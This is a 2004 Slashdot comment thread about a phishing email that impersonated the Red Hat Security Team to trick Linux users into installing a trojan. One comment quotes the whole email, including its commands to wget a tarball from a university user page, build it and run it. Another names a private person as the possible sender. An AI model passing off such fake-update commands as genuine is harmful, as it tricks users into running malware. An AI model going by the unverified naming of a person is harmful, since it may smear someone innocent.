Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.
The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
Why not just use the real link and slashdot their site into oblivion!
Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.
However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
OK, we all know no Linux Guru will ever fall for this kind of stupid trick.
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.
Eureka Science News - automatically updated
Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.
Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
________
Entranced by anime since late summer 2001 and loving it ^_^
Either it is malicious or not.
Don't they know ?
If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.
What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.
There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted) so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of a Historical Minatures Gaming Society in his area (HMGS West, near the bottom of the page).
The question begging to be asked is why is this site still alive?
/. effect!
heh, maybe it won't be for long with the
The race isn't always to the swift... but that's the way to bet!
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Here's what I do: Bitty Browser & Andromeda
Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.
TO BUY A NEW CAR WOULD MAKE YOU SEXUALLY ATTRACTIVE.
without bothering to RTFA, and mistakenly think that it's a legit patch,
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
Do you know if there's a cure for this?
A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...
On computer geeks, need to know how things work naturally becomes directed towards computers...
This is so cool !
Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.
It would be even better if you could use it as a rule to manage messages - ie immediately trash spoffed messages without presenting them to the end user.
Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.
Please submit it - it's a damn fine idea.
The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why
It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
- MbM
The original email that was making the rounds:
. gz ./inst
/~joeio is Irene O Joe from Law School. Was the Stanford website compromised?
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar
* Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
The interesting thing is the link that is listed to download the trojan. Its the Stanford website. The person who owns
Do you know if there's a cure for this?
You don't want a cure for this.
If you want a legitimate comparison between Linux and Windows security, observe:
This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".
Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
>Brandybuck (704397) wrote: ...
>doesn't belong to RedHat? This is social engineering at its finest.
At it's finest? Who the hell are you kidding. This is a sample of social engineering yes... but... my god it's far from being the cream of the crop. Way way way to many simple mistakes.
Show's lack for attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amature...
Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.
this doesn't even register on the talent meter of social engineering.
Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email their receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.
Don't blame me, I didn't vote for either of them!
Really now? This should set off alarms in people's minds?
Yes. At least in combination with the other glaring flaws I and others have already mentioned.
People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains that are usually referenced to and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious to unsolicited messages of this kind.
There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.
It's social engineering all right. Just not at its finest.
Help savingAmigaOS and a free PowerPC market
We're supposed to believe this?
...the system works!
Agreed, but it needs be very very careful as to any assumptions as to exactly which system it was that worked.
The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superor forces with inferior forces.
Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.